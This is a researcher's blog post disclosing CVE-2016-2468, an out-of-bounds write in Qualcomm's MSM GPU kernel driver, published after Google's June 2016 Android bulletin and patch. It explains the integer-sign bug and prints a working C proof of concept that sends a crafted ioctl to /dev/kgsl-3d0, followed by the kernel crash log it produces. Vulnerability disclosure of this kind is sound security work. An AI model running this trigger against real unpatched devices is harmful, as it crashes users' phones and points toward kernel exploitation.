Disclosure of CVE-2016-2468, OOB write in Qualcomm MSM GPU driver
作者:retme 发布时间:June 12, 2016 分类:AndroidSec
This issue has been released in the June 2016 Nexus public bulletin.
https://source.android.com/security/bulletin/2016-06-01.html#acknowledgements
Technical Detail:
In _kgsl_sharedmem_page_alloc,if the low 32bit part of 'size' > 0x80000000,variable 'len' will be a negative number.
Then it will not enter the while loop and reach 'sg_mark_end(&memdesc->sg[sglen - 1]);'
Note that variable 'sglen' is zero, so the mark will be set on the address 'memdesc->sg[-1]'.
static int _kgsl_sharedmem_page_alloc(struct kgsl_memdesc *memdesc, struct kgsl_pagetable *pagetable, size_t size) { int ret = 0; int len, page_size, sglen_alloc, sglen = 0; unsigned int align; //...snip... len = size; while (len > 0) { //...snip... } memdesc->sglen = sglen; memdesc->size = size; sg_mark_end(&memdesc->sg[sglen - 1]);
PoC:
void kgsl_poc(){ //kgsl_sharedmem_page_alloc_user int fd = open("/dev/kgsl-3d0",0); struct kgsl_gpumem_alloc_id arg; arg.flags = 0; arg.size = 0xa18fb010b0c08000; ioctl(fd,IOCTL_KGSL_GPUMEM_ALLOC_ID, &arg); } int main(int argc, char *argv[]) { kgsl_poc(); return 0; }
crash :
<1>[ 112.913308] Unable to handle kernel paging request at virtual address ffffff800da40fe0 <1>[ 112.913323] pgd = ffffffc0588a8000 <1>[ 112.913328] [ffffff800da40fe0] *pgd=0000000000000000 <0>[ 112.913339] Internal error: Oops: 96000007 [#1] PREEMPT SMP <4>[ 112.913350] CPU: 2 PID: 5511 Comm: 3636test Tainted: G W 3.10.73-gda330d0 #1 <4>[ 112.913356] task: ffffffc0b0600000 ti: ffffffc0946fc000 task.ti: ffffffc0946fc000 <4>[ 112.913370] PC is at kgsl_sharedmem_page_alloc_user+0x1ec/0x268 <4>[ 112.913376] LR is at kgsl_sharedmem_page_alloc_user+0xa8/0x268 <4>[ 112.913382] pc : [<ffffffc000576b58>] lr : [<ffffffc000576a14>] pstate: a0000145 <4>[ 112.913386] sp : ffffffc0946ffc10 <4>[ 112.913390] x29: ffffffc0946ffc10 x28: ffffffc000000000 <4>[ 112.913398] x27: ffffffc000c9d000 x26: 0000000000001500 <4>[ 112.913406] x25: ffffffc000c9a000 x24: cccccccccccccccd <4>[ 112.913415] x23: ffffffc001791bc0 x22: 00000000b0c08000 <4>[ 112.913423] x21: a18fb010b0c08000 x20: ffffffffffffffe0 <4>[ 112.913431] x19: ffffffc093255248 x18: 0000007f9b45c000 <4>[ 112.913439] x17: 0000007f9b309264 x16: ffffffc00030cf48 <4>[ 112.913447] x15: 0000000000000001 x14: 0000007f9b44e040 <4>[ 112.913454] x13: 00000000000000a0 x12: 0000000000000001 <4>[ 112.913462] x11: 0000000000000068 x10: 0140000000000000 <4>[ 112.913471] x9 : 0000000000000000 x8 : ffffff802f059100 <4>[ 112.913478] x7 : 0000000000000000 x6 : 000000000000003f <4>[ 112.913486] x5 : 0000000000000040 x4 : 0000000000000000 <4>[ 112.913494] x3 : 0000000000000004 x2 : 0000000000000000 <4>[ 112.913502] x1 : ffffff800da41000 x0 : ffffffffffffffe0 <4>[ 112.913509] <0>[ 112.913514] Process 3636test (pid: 5511, stack limit = 0xffffffc0946fc058) <4>[ 112.913519] Call trace: <4>[ 112.913526] [<ffffffc000576b58>] kgsl_sharedmem_page_alloc_user+0x1ec/0x268 <4>[ 112.913535] [<ffffffc000569820>] _gpumem_alloc+0x150/0x1d0 <4>[ 112.913543] [<ffffffc00056d424>] kgsl_ioctl_gpumem_alloc_id+0x30/0x180 <4>[ 112.913550] [<ffffffc00056f704>] kgsl_ioctl_helper+0x220/0x2b8 <4>[ 112.913558] [<ffffffc00056f7b8>] kgsl_ioctl+0x1c/0x28 <4>[ 112.913566] [<ffffffc00030ce74>] do_vfs_ioctl+0x4a8/0x57c <4>[ 112.913573] [<ffffffc00030cfa4>] SyS_ioctl+0x5c/0x88 <0>[ 112.913581] Code: d503201f 9b210294 f9402261 f9001a75 (f8746820)
Any application can access device '/dev/kgsl-3d0'.That's why Android Sec Team set it to Critical severity.
patch:
https://android.googlesource.com/kernel/msm/+/fb17eb73640b869ed4920791af1dfd680026fd49%5E%21/#F0
[...]http://retme.net/index.php/2016/06/12/CVE-2016-2468.html[...]